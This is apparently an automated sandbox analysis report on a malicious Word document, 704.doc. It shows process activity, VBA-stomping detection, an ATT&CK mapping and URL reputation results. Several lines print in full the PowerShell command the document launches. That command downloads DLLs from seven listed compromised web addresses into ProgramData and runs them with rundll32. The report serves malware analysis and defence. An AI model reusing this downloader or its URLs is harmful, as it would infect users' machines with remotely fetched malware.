Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2916Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_000007FF00260F3C sldt word ptr [eax]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000004.00000002.434822089.00000000002D0000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

barindex
Document contains VBA stomped code (only p-code) potentially bypassing AV detectionShow sources
Source: 704.docOLE indicator, VBA stomping: true
Source: ~DF59F33552EDE7EF7C.TMP.0.drOLE indicator, VBA stomping: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $dfkj="$strs=\"http://primtalent.com/wp-admin/9yt1u/,http://huskysb.com/wordpress/6f0qIQlWPaYDfa/,http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/,http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/,http://ckfoods.net/wp-admin/wPInm2rgMu/,http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/,http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"c:\programdata\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"c:\windows\syswow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter111Path InterceptionProcess Injection11Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting32Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution1Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonScripting32Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
704.doc100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\~DF59F33552EDE7EF7C.TMP100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://huskysb.com/wordpress/6f0qIQ0%Avira URL Cloudsafe
http://huskysb.com/wordpre0%Avira URL Cloudsafe
http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/PE0%Avira URL Cloudsafe
http://ckfoods.net/wp-admin/wPInm2rgMu/100%Avira URL Cloudmalware
http://primtalent.com/wp-admin/9yt1u/0%Avira URL Cloudsafe
http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/0%Avira URL Cloudsafe
http://huskysb.com/wordpress/6f0qIQlWPaYDfa/0%Avira URL Cloudsafe
http://adorwelding.zmo0%Avira URL Cloudsafe
http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/0%Avira URL Cloudsafe
http://server.zmotpro.com/venkat/0%Avira URL Cloudsafe
http://adorwelding.zmotp0%Avira URL Cloudsafe
http://manak.edunetf0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/100%Avira URL Cloudmalware
http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/100%Avira URL Cloudmalware
http://primtalent.com/wp-admin/90%Avira URL Cloudsafe
http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/P0%Avira URL Cloudsafe
http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBW0%Avira URL Cloudsafe
http://ckfoods.net/wp-admin/wP0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://huskysb.com/wordpress/6f0qIQpowershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmptrue
  • Avira URL Cloud: safe
unknown
http://huskysb.com/wordprepowershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmptrue
  • Avira URL Cloud: safe
unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmpfalse
    		high
    http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/PEpowershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://ckfoods.net/wp-admin/wPInm2rgMu/powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    http://primtalent.com/wp-admin/9yt1u/powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmptrue
    • Avira URL Cloud: safe
    		unknown
    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000004.00000002.434822089.00000000002D0000.00000004.00000020.sdmpfalse
      		high
      http://huskysb.com/wordpress/6f0qIQlWPaYDfa/powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://adorwelding.zmopowershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWlfeSZmzv/powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://server.zmotpro.com/venkat/powershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://adorwelding.zmotppowershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://manak.edunetfpowershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://www.%s.comPApowershell.exe, 00000004.00000002.435087637.00000000024B0000.00000002.00020000.sdmpfalse
      • URL Reputation: safe
      		low
      http://manak.edunetfoundation.org/school-facilitator/qlwM2RAHhDG8N8/powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      http://ridcyf.com/dm7vg/DGWFrJA0kutWTk/powershell.exe, 00000004.00000002.434797160.0000000000280000.00000004.00000020.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      http://primtalent.com/wp-admin/9powershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://server.zmotpro.com/venkat/products/facebook-page/assets/kmIdeXnG/Ppowershell.exe, 00000004.00000002.435665770.0000000002C80000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://adorwelding.zmotpro.com/wp-content/Z8ifMTCM2VBWpowershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmptrue
      • Avira URL Cloud: safe
      		unknown
      http://ckfoods.net/wp-admin/wPpowershell.exe, 00000004.00000002.437172089.00000000035CB000.00000004.00000001.sdmptrue
      • Avira URL Cloud: safe
      		unknown

      Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:526268
      Start date:22.11.2021
      Start time:13:15:10
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 31s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:704.doc
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:6
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • GSI enabled (VBA)
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal92.expl.evad.winDOC@5/13@0/0
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .doc
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
      • Execution Graph export aborted for target powershell.exe, PID 2776 because it is empty
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtSetInformationFile calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      13:15:25API Interceptor64x Sleep call for process: powershell.exe modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F744DDE.png
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:PNG image data, 1127 x 490, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):121507
      Entropy (8bit):7.978393301250379
      Encrypted:false
      SSDEEP:3072:oXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqc:oXw50+OukzVXV2uhDj
      MD5:D3C11BC087FAF4372F4C5D37E06FCFFD
      SHA1:40A9FE4D47DADFDB1463D63F14D6D60641AC19E5
      SHA-256:6F49F13CEF0667A75A3E55767CD769F476EB3FF400BDA8CB3FBF47BA8B0A7077
